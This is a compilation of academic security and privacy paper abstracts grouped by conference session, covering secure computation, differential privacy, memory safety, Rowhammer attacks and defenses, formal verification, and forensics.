We present CrypTFlow, a first of its kind system that converts TensorFlow inference code into Secure Multi-party Computation (MPC) protocols at the push of a button. To do this, we build three components. Our first component, Athos, is an end-to-end compiler from TensorFlow to a variety of semihonest MPC protocols. The second component, Porthos, is an improved semi-honest 3-party protocol that provides significant speedups for TensorFlow like applications. Finally, to provide malicious secure MPC protocols, our third component, Aramis, is a novel technique that uses hardware with integrity guarantees to convert any semi-honest MPC protocol into an MPC protocol that provides malicious security. The malicious security of the protocols output by Aramis relies on integrity of the hardware and semi-honest security of MPC. Moreover, our system matches the inference accuracy of plaintext TensorFlow.We experimentally demonstrate the power of our system by showing the secure inference of real-world neural networks such as ResNet50 and DenseNet121 over the ImageNet dataset with running times of about 30 seconds for semi-honest security and under two minutes for malicious security. Prior work in the area of secure inference has been limited to semi-honest security of small networks over tiny datasets such as MNIST or CIFAR. Even on MNIST/CIFAR, CrypTFlow outperforms prior work.

Session #3: Differential Privacy

SoK: Differential Privacy as a Causal Property

We present formal models of the associative and causal views of differential privacy. Under the associative view, the possibility of dependencies between data points precludes a simple statement of differential privacy’s guarantee as conditioning upon a single changed data point. However, we show that a simple characterization of differential privacy as limiting the effect of a single data point does exist under the causal view, without independence assumptions about data points. We believe this characterization resolves disagreement and confusion in prior work about the consequences of differential privacy. The associative view needing assumptions boils down to the contrapositive of the maxim that correlation doesn’t imply causation: differential privacy ensuring a lack of (strong) causation does not imply a lack of (strong) association. Our characterization also opens up the possibility of applying results from statistics, experimental design, and science about causation while studying differential privacy.

Private Resource Allocators and Their Applications

This paper introduces a new cryptographic primitive called a private resource allocator (PRA) that can be used to allocate resources (e.g., network bandwidth, CPUs) to a set of clients without revealing to the clients whether any other clients received resources. We give several constructions of PRAs that provide guarantees ranging from information-theoretic to differential privacy. PRAs are useful in preventing a new class of attacks that we call allocation-based side-channel attacks. These attacks can be used, for example, to break the privacy guarantees of anonymous messaging systems that were designed specifically to defend against side-channel and traffic analysis attacks. Our implementation of PRAs in Alpenhorn, which is a recent anonymous messaging system, shows that PRAs increase the network resources required to start a conversation by up to 16× (can be made as low as 4× in some cases), but add no overhead once the conversation has been established.

Towards Effective Differential Privacy Communication for Users’ Data Sharing Decision and Comprehension

Differential privacy protects an individual’s privacy by perturbing data on an aggregated level (DP) or individual level (LDP). We report four online human-subject experiments investigating the effects of using different approaches to communicate differential privacy techniques to laypersons in a health app data collection setting. Experiments 1 and 2 investigated participants’ data disclosure decisions for low-sensitive and high-sensitive personal information when given different DP or LDP descriptions. Experiments 3 and 4 uncovered reasons behind participants’ data sharing decisions, and examined participants’ subjective and objective comprehensions of these DP or LDP descriptions. When shown descriptions that explain the implications instead of the definition/processes of DP or LDP technique, participants demonstrated better comprehension and showed more willingness to share information with LDP than with DP, indicating their understanding of LDP’s stronger privacy guarantee compared with DP.

A Programming Framework for Differential Privacy with Accuracy Concentration Bounds

Differential privacy offers a formal framework for reasoning about privacy and accuracy of computations on private data. It also offers a rich set of building blocks for constructing private data analyses. When carefully calibrated, these analyses simultaneously guarantee the privacy of the individuals contributing their data, and the accuracy of the data analyses results, inferring useful properties about the population. The compositional nature of differential privacy has motivated the design and implementation of several programming languages aimed at helping a data analyst in programming differentially private analyses. However, most of the programming languages for differential privacy proposed so far provide support for reasoning about privacy but not for reasoning about the accuracy of data analyses. To overcome this limitation, in this work we present DPella, a programming framework providing data analysts with support for reasoning about privacy, accuracy and their trade-offs. The distinguishing feature of DPella is a novel component which statically tracks the accuracy of different data analyses. In order to make tighter accuracy estimations, this component leverages taint analysis for automatically inferring statistical independence of the different noise quantities added for guaranteeing privacy. We evaluate our approach by implementing several classical queries from the literature and showing how data analysts can figure out the best manner to calibrate privacy to meet the accuracy requirements.

Session #4: Memory Safety

xMP: Selective Memory Protection for Kernel and User Space

Attackers leverage memory corruption vulnerabilities to establish primitives for reading from or writing to the address space of a vulnerable process. These primitives form the foundation for code-reuse and data-oriented attacks. While various defenses against the former class of attacks have proven effective, mitigation of the latter remains an open problem. In this paper, we identify various shortcomings of the x86 architecture regarding memory isolation, and leverage virtualization to build an effective defense against data-oriented attacks. Our approach, called xMP, provides (in-guest) selective memory protection primitives that allow VMs to isolate sensitive data in user or kernel space in disjoint xMP domains. We interface the Xen altp2m subsystem with the Linux memory management system, lending VMs the flexibility to define custom policies. Contrary to conventional approaches, xMP takes advantage of virtualization extensions, but after initialization, it does not require any hypervisor intervention. To ensure the integrity of in-kernel management information and pointers to sensitive data within isolated domains, xMP protects pointers with HMACs bound to an immutable context, so that integrity validation succeeds only in the right context. We have applied xMP to protect the page tables and process credentials of the Linux kernel, as well as sensitive data in various user-space applications. Overall, our evaluation shows that xMP introduces minimal overhead for real-world workloads and applications, and offers effective protection against data-oriented attacks.

MarkUs: Drop-in use-after-free prevention for low-level languages

Use-after-free vulnerabilities have plagued software written in low-level languages, such as C and C++, becoming one of the most frequent classes of exploited software bugs. Attackers identify code paths where data is manually freed by the programmer, but later incorrectly reused, and take advantage by reallocating the data to themselves. They then alter the data behind the program’s back, using the erroneous reuse to gain control of the application and, potentially, the system. While a variety of techniques have been developed to deal with these vulnerabilities, they often have unacceptably high performance or memory overheads, especially in the worst case.We have designed MarkUs, a memory allocator that prevents this form of attack at low overhead, sufficient for deployment in real software, even under allocation- and memory-intensive scenarios. We prevent use-after-free attacks by quarantining data freed by the programmer and forbidding its reallocation until we are sure that there are no dangling pointers targeting it. To identify these we traverse live-objects accessible from registers and memory, marking those we encounter, to check whether quarantined data is accessible from any currently allocated location. Unlike garbage collection, which is unsafe in C and C++, MarkUs ensures safety by only freeing data that is both quarantined by the programmer and has no identifiable dangling pointers. The information provided by the programmer’s allocations and frees further allows us to optimise the process by freeing physical addresses early for large objects, specialising analysis for small objects, and only performing marking when sufficient data is in quarantine. Using MarkUs, we reduce the overheads of temporal safety in low-level languages to 1.1× on average for SPEC CPU2006, with a maximum slowdown of only 2×, vastly improving upon the state-of-the-art.

SEIMI: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation

Memory-corruption attacks such as code-reuse attacks and data-only attacks have been a key threat to systems security. To counter these threats, researchers have proposed a variety of defenses, including control-flow integrity (CFI), code-pointer integrity (CPI), and code (re-)randomization. All of them, to be effective, require a security primitive—intra-process protection of confidentiality and/or integrity for sensitive data (such as CFI’s shadow stack and CPI’s safe region).In this paper, we propose SEIMI, a highly efficient intra-process memory isolation technique for memory-corruption defenses to protect their sensitive data. The core of SEIMI is to use the efficient Supervisor-mode Access Prevention (SMAP), a hardware feature that is originally used for preventing the kernel from accessing the user space, to achieve intra-process memory isolation. To leverage SMAP, SEIMI creatively executes the user code in the privileged mode. In addition to enabling the new design of the SMAP-based memory isolation, we further develop multiple new techniques to ensure secure escalation of user code, e.g., using the descriptor caches to capture the potential segment operations and configuring the Virtual Machine Control Structure (VMCS) to invalidate the execution result of the control registers related operations. Extensive experimental results show that SEIMI outperforms existing isolation mechanisms, including both the Memory Protection Keys (MPK) based scheme and the Memory Protection Extensions (MPX) based scheme, while providing secure memory isolation.

Cornucopia: Temporal Safety for CHERI Heaps

Use-after-free violations of temporal memory safety continue to plague software systems, underpinning many high-impact exploits. The CHERI capability system shows great promise in achieving C and C++ language spatial memory safety, preventing out-of-bounds accesses. Enforcing language-level temporal safety on CHERI requires capability revocation, traditionally achieved either via table lookups (avoided for performance in the CHERI design) or by identifying capabilities in memory to revoke them (similar to a garbage-collector sweep). CHERIvoke, a prior feasibility study, suggested that CHERI’s tagged capabilities could make this latter strategy viable, but modeled only architectural limits and did not consider the full implementation or evaluation of the approach.Cornucopia is a lightweight capability revocation system for CHERI that implements non-probabilistic C/C++ temporal memory safety for standard heap allocations. It extends the CheriBSD virtual-memory subsystem to track capability flow through memory and provides a concurrent kernel-resident revocation service that is amenable to multi-processor and hardware acceleration. We demonstrate an average overhead of less than 2% and a worst-case of 8.9% for concurrent revocation on compatible SPEC CPU2006 benchmarks on a multi-core CHERI CPU on FPGA, and we validate Cornucopia against the Juliet test suite’s corpus of temporally unsafe programs. We test its compatibility with a large corpus of C programs by using a revoking allocator as the system allocator while booting multi-user CheriBSD. Cornucopia is a viable strategy for always-on temporal heap memory safety, suitable for production environments.

Session #4: Computing and Society

The Many Kinds of Creepware Used for Interpersonal Attacks

Technology increasingly facilitates interpersonal attacks such as stalking, abuse, and other forms of harassment. While prior studies have examined the ecosystem of software designed for stalking, there exists an unstudied, larger landscape of apps—what we call creepware—used for interpersonal attacks. In this paper, we initiate a study of creepware using access to a dataset detailing the mobile apps installed on over 50 million Android devices. We develop a new algorithm, CreepRank, that uses the principle of guilt by association to help surface previously unknown examples of creepware, which we then characterize through a combination of quantitative and qualitative methods. We discovered apps used for harassment, impersonation, fraud, information theft, concealment, and even apps that purport to defend victims against such threats. As a result of our work, the Google Play Store has already removed hundreds of apps for policy violations. More broadly, our findings and techniques improve understanding of the creepware ecosystem, and will inform future efforts that aim to mitigate interpersonal attacks.

How Not to Prove Your Election Outcome

The Scytl/SwissPost e-voting solution was intended to provide complete verifiability for Swiss government elections. We show failures in both individual verifiability and universal verifiability (as defined in Swiss Federal Ordinance 161.116), based on mistaken implementations of cryptographic components. These failures allow for the construction of “proofs” of an accurate election outcome that pass verification though the votes have been manipulated. Using sophisticated cryptographic protocols without a proper consideration of what properties they offer, and under which conditions, can introduce opportunities for undetectable fraud even though the system appears to allow verification of the outcome.Our findings are immediately relevant to systems in use in Switzerland and Australia, and probably also elsewhere.

A Security Analysis of the Facebook Ad Library

Actors engaged in election disinformation are using online advertising platforms to spread political messages. In response to this threat, online advertising networks have started making political advertising on their platforms more transparent in order to enable third parties to detect malicious advertisers. We present a set of methodologies and perform a security analysis of Facebook’s U.S. Ad Library, which is their political advertising transparency product. Unfortunately, we find that there are several weaknesses that enable a malicious advertiser to avoid accurate disclosure of their political ads. We also propose a clustering-based method to detect advertisers engaged in undeclared coordinated activity. Our clustering method identified 16 clusters of likely inauthentic communities that spent a total of over four million dollars on political advertising. This supports the idea that transparency could be a promising tool for combating disinformation. Finally, based on our findings, we make recommendations for improving the security of advertising transparency on Facebook and other platforms.

Can Voters Detect Malicious Manipulation of Ballot Marking Devices?

Ballot marking devices (BMDs) allow voters to select candidates on a computer kiosk, which prints a paper ballot that the voter can review before inserting it into a scanner to be tabulated. Unlike paperless voting machines, BMDs provide voters an opportunity to verify an auditable physical record of their choices, and a growing number of U.S. jurisdictions are adopting them for all voters. However, the security of BMDs depends on how reliably voters notice and correct any adversarially induced errors on their printed ballots. In order to measure voters’ error detection abilities, we conducted a large study (N = 241) in a realistic polling place setting using real voting machines that we modified to introduce an error into each printout. Without intervention, only 40% of participants reviewed their printed ballots at all, and only 6.6% told a poll worker something was wrong. We also find that carefully designed interventions can improve verification performance. Verbally instructing voters to review the printouts and providing a written slate of candidates for whom to vote both significantly increased review and reporting rates—although the improvements may not be large enough to provide strong security in close elections, especially when BMDs are used by all voters. Based on these findings, we make several evidence-based recommendations to help better defend BMD-based elections.

Session #4: Multiparty Computation

Efficient and Secure Multiparty Computation from Fixed-Key Block Ciphers

Many implementations of secure computation use fixed-key AES (modeled as a random permutation); this results in substantial performance benefits due to existing hardware support for AES and the ability to avoid recomputing the AES key schedule. Surveying these implementations, however, we find that most utilize AES in a heuristic fashion; in the best case this leaves a gap in the security proof, but in many cases we show it allows for explicit attacks.Motivated by this unsatisfactory state of affairs, we initiate a comprehensive study of how to use fixed-key block ciphers for secure computation—in particular for OT extension and circuit garbling—efficiently and securely. Specifically:•We consider several notions of pseudorandomness for hash functions (e.g., correlation robustness), and show provably secure schemes for OT extension, garbling, and other applications based on hash functions satisfying these notions.•We provide provably secure constructions, in the (non-programmable) random-permutation model, of hash functions satisfying the different notions of pseudorandomness we consider.Taken together, our results provide end-to-end security proofs for implementations of secure-computation protocols based on fixed-key block ciphers (modeled as random permutations). Perhaps surprisingly, at the same time our work also results in noticeable performance improvements over the state-of-the-art.

Path Oblivious Heap: Optimal and Practical Oblivious Priority Queue

We propose Path Oblivious Heap, an extremely simple, practical, and optimal oblivious priority queue. Our construction also implies a practical and optimal oblivious sorting algorithm which we call Path Oblivious Sort. Not only are our algorithms asymptotically optimal, we show that their practical performance is only a small constant factor worse than insecure baselines. More specificially, assuming roughly logarithmic client private storage, Path Oblivious Heap consumes 2× to 7× more bandwidth than the ordinary insecure binary heap; and Path Oblivious Sort consumes 4.5× to 6× more bandwidth than the insecure Merge Sort. We show that these performance results improve existing works by 1-2 orders of magnitude. Finally, we evaluate our algorithm for a multi-party computation scenario and show 7x to 8x reduction in the number of symmetric encryptions relative to the state of the art 1 .

Transparent Polynomial Delegation and Its Applications to Zero Knowledge Proof

We present a new succinct zero knowledge argument scheme for layered arithmetic circuits without trusted setup. The prover time is O(C + nlogn) and the proof size is O(D logC +log 2 n) for a D-depth circuit with n inputs and C gates. The verification time is also succinct, O(D logC + log 2 n), if the circuit is structured. Our scheme only uses lightweight cryptographic primitives such as collision-resistant hash functions and is plausibly post-quantum secure. We implement a zero knowledge argument system, Virgo, based on our new scheme and compare its performance to existing schemes. Experiments show that it only takes 53 seconds to generate a proof for a circuit computing a Merkle tree with 256 leaves, at least an order of magnitude faster than all other succinct zero knowledge argument schemes. The verification time is 50ms, and the proof size is 253KB, both competitive to existing systems.Underlying Virgo is a new transparent zero knowledge verifiable polynomial delegation scheme with logarithmic proof size and verification time. The scheme is in the interactive oracle proof model and may be of independent interest.

Towards Scalable Threshold Cryptosystems

The resurging interest in Byzantine fault tolerant systems will demand more scalable threshold cryptosystems. Unfortunately, current systems scale poorly, requiring time quadratic in the number of participants. In this paper, we present techniques that help scale threshold signature schemes (TSS), verifiable secret sharing (VSS) and distributed key generation (DKG) protocols to hundreds of thousands of participants and beyond. First, we use efficient algorithms for evaluating polynomials at multiple points to speed up computing Lagrange coefficients when aggregating threshold signatures. As a result, we can aggregate a 130,000 out of 260,000 BLS threshold signature in just 6 seconds (down from 30 minutes). Second, we show how “authenticating” such multipoint evaluations can speed up proving polynomial evaluations, a key step in communication-efficient VSS and DKG protocols. As a result, we reduce the asymptotic (and concrete) computational complexity of VSS and DKG protocols from quadratic time to quasilinear time, at a small increase in communication complexity. For example, using our DKG protocol, we can securely generate a key for the BLS scheme above in 2.3 hours (down from 8 days). Our techniques improve performance for thresholds as small as 255 and generalize to any Lagrange-based threshold scheme, not just threshold signatures. Our work has certain limitations: we require a trusted setup, we focus on synchronous VSS and DKG protocols and we do not address the worst-case complaint overhead in DKGs. Nonetheless, we hope it will spark new interest in designing large-scale distributed systems.

Session #5: Web Privacy

RAMBleed: Reading Bits in Memory Without Accessing Them

The Rowhammer bug is a reliability issue in DRAM cells that can enable an unprivileged adversary to flip the values of bits in neighboring rows on the memory module. Previous work has exploited this for various types of fault attacks across security boundaries, where the attacker flips inaccessible bits, often resulting in privilege escalation. It is widely assumed however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations.We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel. More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel. Thus, the primary contribution of this work is to show that Rowhammer is a threat to not only integrity, but to confidentiality as well.Furthermore, in contrast to Rowhammer write side channels, which require persistent bit flips, our read channel succeeds even when ECC memory detects and corrects every bit flip. Thus, we demonstrate the first security implication of successfully-corrected bit flips, which were previously considered benign.To demonstrate the implications of this read side channel, we present an end-to-end attack on OpenSSH 7.9 that extracts an RSA-2048 key from the root level SSH daemon. To accomplish this, we develop novel techniques for massaging memory from user space into an exploitable state, and use the DRAM rowbuffer timing side channel to locate physically contiguous memory necessary for double-sided Rowhammering. Unlike previous Rowhammer attacks, our attack does not require the use of huge pages, and it works on Ubuntu Linux under its default configuration settings.

Are We Susceptible to Rowhammer? An End-to-End Methodology for Cloud Providers

Cloud providers are concerned that Rowhammer poses a potentially critical threat to their servers, yet today they lack a systematic way to test whether the DRAM used in their servers is vulnerable to Rowhammer attacks. This paper presents an endto-end methodology to determine if cloud servers are susceptible to these attacks. With our methodology, a cloud provider can construct worst-case testing conditions for DRAM.We apply our methodology to three classes of servers from a major cloud provider. Our findings show that none of the CPU instruction sequences used in prior work to mount Rowhammer attacks create worst-case DRAM testing conditions. To address this limitation, we develop an instruction sequence that leverages microarchitectural side-effects to “hammer” DRAM at a near-optimal rate on modern Intel Skylake and Cascade Lake platforms. We also design a DDR4 fault injector that can reverse engineer row adjacency for any DDR4 DIMM. When applied to our cloud provider’s DIMMs, we find that DRAM rows do not always follow a linear map.

Leveraging EM Side-Channel Information to Detect Rowhammer Attacks

The rowhammer bug belongs to software-induced hardware faults, and has been exploited to form a wide range of powerful rowhammer attacks. Yet, how to effectively detect such attacks remains a challenging problem. In this paper, we propose a novel approach named RADAR (Rowhammer Attack Detection via A Radio) that leverages certain electromagnetic (EM) signals to detect rowhammer attacks. In particular, we have found that there are recognizable hammering-correlated sideband patterns in the spectrum of the DRAM clock signal. As such patterns are inevitable physical side effects of hammering the DRAM, they can “expose” any potential rowhammer attacks including the extremely elusive ones hidden inside encrypted and isolated environments like Intel SGX enclaves. However, the patterns of interest may become unapparent due to the common use of spread-spectrum clocking (SSC) in computer systems. We propose a de-spreading method that can reassemble the hammering-correlated sideband patterns scattered by SSC. Using a common classification technique, we can achieve both effective and robust detection-based defense against rowhammer attacks, as evaluated on a RADAR prototype under various scenarios. In addition, our RADAR does not impose any performance overhead on the protected system. There has been little prior work that uses physical side-channel information to perform rowhammer defenses, and to the best of our knowledge, this is the first investigation on leveraging EM side-channel information for this purpose.

TRRespass: Exploiting the Many Sides of Target Row Refresh

After a plethora of high-profile RowHammer attacks, CPU and DRAM vendors scrambled to deliver what was meant to be the definitive hardware solution against the RowHammer problem: Target Row Refresh (TRR). A common belief among practitioners is that, for the latest generation of DDR4 systems that are protected by TRR, RowHammer is no longer an issue in practice. However, in reality, very little is known about TRR. How does TRR exactly prevent RowHammer? Which parts of a system are responsible for operating the TRR mechanism? Does TRR completely solve the RowHammer problem or does it have weaknesses? In this paper, we demystify the inner workings of TRR and debunk its security guarantees. We show that what is advertised as a single mitigation mechanism is actually a series of different solutions coalesced under the umbrella term Target Row Refresh. We inspect and disclose, via a deep analysis, different existing TRR solutions and demonstrate that modern implementations operate entirely inside DRAM chips. Despite the difficulties of analyzing in-DRAM mitigations, we describe novel techniques for gaining insights into the operation of these mitigation mechanisms. These insights allow us to build TRRespass, a scalable black-box RowHammer fuzzer that we evaluate on 42 recent DDR4 modules. TRRespass shows that even the latest generation DDR4 chips with in-DRAM TRR, immune to all known RowHammer attacks, are often still vulnerable to new TRR-aware variants of RowHammer that we develop. In particular, TRRespass finds that, on present-day DDR4 modules, RowHammer is still possible when many aggressor rows are used (as many as 19 in some cases), with a method we generally refer to as Many-sided RowHammer. Overall, our analysis shows that 13 out of the 42 modules from all three major DRAM vendors (i.e., Samsung, Micron, and Hynix) are vulnerable to our TRR-aware RowHammer access patterns, and thus one can still mount existing state-of-the-art system-level RowHammer attacks. In a…

Session #6: Formal Verification

The Last Mile: High-Assurance and High-Speed Cryptographic Implementations

We develop a new approach for building cryptographic implementations. Our approach goes the last mile and delivers assembly code that is provably functionally correct, protected against side-channels, and as efficient as hand-written assembly. We illustrate our approach using ChaCha20-Poly1305, one of the two ciphersuites recommended in TLS 1.3, and deliver formally verified vectorized implementations which outperform the fastest non-verified code.We realize our approach by combining the Jasmin framework, which offers in a single language features of high-level and low-level programming, and the EasyCrypt proof assistant, which offers a versatile verification infrastructure that supports proofs of functional correctness and equivalence checking. Neither of these tools had been used for functional correctness before. Taken together, these infrastructures empower programmers to develop efficient and verified implementations by “game hopping”, starting from reference implementations that are proved functionally correct against a specification, and gradually introducing program optimizations that are proved correct by equivalence checking.We also make several contributions of independent interest, including a new and extensible verified compiler for Jasmin, with a richer memory model and support for vectorized instructions, and a new embedding of Jasmin in EasyCrypt.

EverCrypt: A Fast, Verified, Cross-Platform Crytographic Provider

We present EverCrypt: a comprehensive collection of verified, high-performance cryptographic functionalities available via a carefully designed API. The API provably supports agility (choosing between multiple algorithms for the same functionality) and multiplexing (choosing between multiple implementations of the same algorithm). Through abstraction and zero-cost generic programming, we show how agility can simplify verification without sacrificing performance, and we demonstrate how C and assembly can be composed and verified against shared specifications. We substantiate the effectiveness of these techniques with new verified implementations (including hashes, Curve25519, and AES-GCM) whose performance matches or exceeds the best unverified implementations. We validate the API design with two high-performance verified case studies built atop EverCrypt, resulting in line-rate performance for a secure network protocol and a Merkle-tree library, used in a production blockchain, that supports 2.7 million insertions/sec. Altogether, EverCrypt consists of over 124K verified lines of specs, code, and proofs, and it produces over 29K lines of C and 14K lines of assembly code.

Rigorous Engineering for Hardware Security: Formal Modelling and Proof in the CHERI Design and Implementation Process

The root causes of many security vulnerabilities include a pernicious combination of two problems, often regarded as inescapable aspects of computing. First, the protection mechanisms provided by the mainstream processor architecture and C/C++ language abstractions, dating back to the 1970s and before, provide only coarse-grain virtual-memory-based protection. Second, mainstream system engineering relies almost exclusively on test-and-debug methods, with (at best) prose specifications. These methods have historically sufficed commercially for much of the computer industry, but they fail to prevent large numbers of exploitable bugs, and the security problems that this causes are becoming ever more acute.In this paper we show how more rigorous engineering methods can be applied to the development of a new security-enhanced processor architecture, with its accompanying hardware implementation and software stack. We use formal models of the complete instruction-set architecture (ISA) at the heart of the design and engineering process, both in lightweight ways that support and improve normal engineering practice - as documentation, in emulators used as a test oracle for hardware and for running software, and for test generation - and for formal verification. We formalise key intended security properties of the design, and establish that these hold with mechanised proof. This is for the same complete ISA models (complete enough to boot operating systems), without idealisation.We do this for CHERI, an architecture with hardware capabilities that supports fine-grained memory protection and scalable secure compartmentalisation, while offering a smooth adoption path for existing software. CHERI is a maturing research architecture, developed since 2010, with work now underway on an Arm industrial prototype to explore its possible adoption in mass-market commercial processors. The rigorous engineering work described here has been an integral part of its development to date, enabling more rapid and confident experimentation, and boosting confidence in the design.

Binsec/Rel: Efficient Relational Symbolic Execution for Constant-Time at Binary-Level

The constant-time programming discipline (CT) is an efficient countermeasure against timing side-channel attacks, requiring the control flow and the memory accesses to be independent from the secrets. Yet, writing CT code is challenging as it demands to reason about pairs of execution traces (2-hypersafety property) and it is generally not preserved by the compiler, requiring binary-level analysis. Unfortunately, current verification tools for CT either reason at higher level (C or LLVM), or sacrifice bug-finding or bounded-verification, or do not scale. We tackle the problem of designing an efficient binary-level verification tool for CT providing both bug-finding and bounded-verification. The technique builds on relational symbolic execution enhanced with new optimizations dedicated to information flow and binary-level analysis, yielding a dramatic improvement over prior work based on symbolic execution. We implement a prototype, BINSEC/REL, and perform extensive experiments on a set of 338 cryptographic implementations, demonstrating the benefits of our approach in both bug-finding and bounded-verification. Using BINSEC/REL, we also automate a previous manual study of CT preservation by compilers. Interestingly, we discovered that gcc -O0 and backend passes of clang introduce violations of CT in implementations that were previously deemed secure by a state-of-the-art CT verification tool operating at LLVM level, showing the importance of reasoning at binary-level.

Session #6: Attacks and Forensics

PMP: Cost-effective Forced Execution with Probabilistic Memory Pre-planning

Malware is a prominent security threat and exposing malware behavior is a critical challenge. Recent malware often has payload that is only released when certain conditions are satisfied. It is hence difficult to fully disclose the payload by simply executing the malware. In addition, malware samples may be equipped with cloaking techniques such as VM detectors that stop execution once detecting that the malware is being monitored. Forced execution is a highly effective method to penetrate malware self-protection and expose hidden behavior, by forcefully setting certain branch outcomes. However, an existing state-of-the-art forced execution technique X-Force is very heavyweight, requiring tracing individual instructions, reasoning about pointer alias relations on-the-fly, and repairing invalid pointers by on-demand memory allocation. We develop a light-weight and practical forced execution technique. Without losing analysis precision, it avoids tracking individual instructions and on-demand allocation. Under our scheme, a forced execution is very similar to a native one. It features a novel memory pre-planning phase that pre-allocates a large memory buffer, and then initializes the buffer, and variables in the subject binary, with carefully crafted values in a random fashion before the real execution. The pre-planning is designed in such a way that dereferencing an invalid pointer has a very large chance to fall into the pre-allocated region and hence does not cause any exception, and semantically unrelated invalid pointer dereferences highly likely access disjoint (pre-allocated) memory regions, avoiding state corruptions with probabilistic guarantees. Our experiments show that our technique is 84 times faster than X-Force, has 6.5X and 10% fewer false positives and negatives for program dependence detection, respectively, and can expose 98% more malicious behaviors in 400 recent malware samples.

Combating Dependence Explosion in Forensic Analysis Using Alternative Tag Propagation Semantics

We are witnessing a rapid escalation in targeted cyber-attacks called Advanced and Persistent Threats (APTs). Carried out by skilled adversaries, these attacks take place over extended time periods, and remain undetected for months. A common approach for retracing the attacker’s steps is to start with one or more suspicious events from system logs, and perform a dependence analysis to uncover the rest of attacker’s actions. The accuracy of this analysis suffers from the dependence explosion problem, which causes a very large number of benign events to be flagged as part of the attack. In this paper, we propose two novel techniques, tag attenuation and tag decay, to mitigate dependence explosion. Our techniques take advantage of common behaviors of benign processes, while providing a conservative treatment of processes and data with suspicious provenance. Our system, called Morse, is able to construct a compact scenario graph that summarizes attacker activity by sifting through millions of system events in a matter of seconds. Our experimental evaluation, carried out using data from two government-agency sponsored red team exercises, demonstrates that our techniques are (a) effective in identifying stealthy attack campaigns, (b) reduce the false alarm rates by more than an order of magnitude, and (c) yield compact scenario graphs that capture the vast majority of the attack, while leaving out benign background activity.

TARDIS: Rolling Back The Clock On CMS-Targeting Cyber Attacks

Over 55% of the world’s websites run on Content Management Systems (CMS). Unfortunately, this huge user population has made CMS-based websites a high-profile target for hackers. Worse still, the vast majority of the website hosting industry has shifted to a “backup and restore” model of security, which relies on error-prone AV scanners to prompt users to roll back to a pre-infection nightly snapshot. This research had the opportunity to study these nightly backups for over 300,000 unique production websites. In doing so, we measured the attack landscape of CMS-based websites and assessed the effectiveness of the backup and restore protection scheme. To our surprise, we found that the evolution of tens of thousands of attacks exhibited clear long-lived multi-stage attack patterns. We now propose TARDIS, an automated provenance inference technique, which enables the investigation and remediation of CMS-targeting attacks based on only the nightly backups already being collected by website hosting companies. With the help of our industry collaborator, we applied TARDIS to the nightly backups of those 300K websites and found 20,591 attacks which lasted from 6 to 1,694 days, some of which were still yet to be detected.

Tactical Provenance Analysis for Endpoint Detection and Response Systems

Endpoint Detection and Response (EDR) tools provide visibility into sophisticated intrusions by matching system events against known adversarial behaviors. However, current solutions suffer from three challenges: 1) EDR tools generate a high volume of false alarms, creating backlogs of investigation tasks for analysts; 2) determining the veracity of these threat alerts requires tedious manual labor due to the overwhelming amount of low-level system logs, creating a “needle-in-a-haystack” problem; and 3) due to the tremendous resource burden of log retention, in practice the system logs describing long-lived attack campaigns are often deleted before an investigation is ever initiated.This paper describes an effort to bring the benefits of data provenance to commercial EDR tools. We introduce the notion of Tactical Provenance Graphs (TPGs) that, rather than encoding low-level system event dependencies, reason about causal dependencies between EDR-generated threat alerts. TPGs provide compact visualization of multi-stage attacks to analysts, accelerating investigation. To address EDR’s false alarm problem, we introduce a threat scoring methodology that assesses risk based on the temporal ordering between individual threat alerts present in the TPG. In contrast to the retention of unwieldy system logs, we maintain a minimally-sufficient skeleton graph that can provide linkability between existing and future threat alerts. We evaluate our system, RapSheet, using the Symantec EDR tool in an enterprise environment. Results show that our approach can rank truly malicious TPGs higher than false alarm TPGs. Moreover, our skeleton graph reduces the long-term burden of log retention by up to 87%.

Throwing Darts in the Dark? Detecting Bots with Limited Data using Neural Data Augmentation

Machine learning has been widely applied to building security applications. However, many machine learning models require the continuous supply of representative labeled data for training, which limits the models’ usefulness in practice. In this paper, we use bot detection as an example to explore the use of data synthesis to address this problem. We collected the network traffic from 3 online services in three different months within a year (23 million network requests). We develop a stream-based feature encoding scheme to support machine learning models for detecting advanced bots. The key novelty is that our model detects bots with extremely limited labeled data. We propose a data synthesis method to synthesize unseen (or future) bot behavior distributions. The synthesis method is distribution-aware, using two different generators in a Generative Adversarial Network to synthesize data for the clustered regions and the outlier regions in the feature space. We evaluate this idea and show our method can train a model that outperforms existing methods with only 1% of the labeled data. We show that data synthesis also improves the model’s sustainability over time and speeds up the retraining. Finally, we compare data synthesis and adversarial retraining and show they can work complementary with each other to improve the model generalizability.

Session #7: Cryptanalysis and Side Channels

JIT Leaks: Inducing Timing Side Channels through Just-In-Time Compilation

Side-channel vulnerabilities in software are caused by an observable imbalance in resource usage across different program paths. We show that just-in-time (JIT) compilation, which is crucial to the runtime performance of modern interpreted languages, can introduce timing side channels in cases where the input distribution to the program is non-uniform. Such timing channels can enable an attacker to infer potentially sensitive information about predicates on the program input.We define three attack models under which such side channels are harnessable and five vulnerability templates to detect susceptible code fragments and predicates. We also propose profiling algorithms to generate the representative statistical information necessary for the attacker to perform accurate inference.We systematically evaluate the strength of these JIT-based side channels on the java.lang.String, java.lang.Math, and java.math.BigInteger classes from the Java standard library, and on the JavaScript built-in objects String, Math, and Array. We carry out our evaluation using two widely adopted, open-source, JIT-enhanced runtime engines for the Java and JavaScript languages: the Oracle HotSpot Java Virtual Machine and the Google V8 JavaScript engine, respectively.Finally, we demonstrate a few examples of JIT-based side channels in the Apache Shiro security framework and the GraphHopper route planning server, and show that they are observable over the public Internet.

The State of the Uniform: Attacks on Encrypted Databases Beyond the Uniform Query Distribution

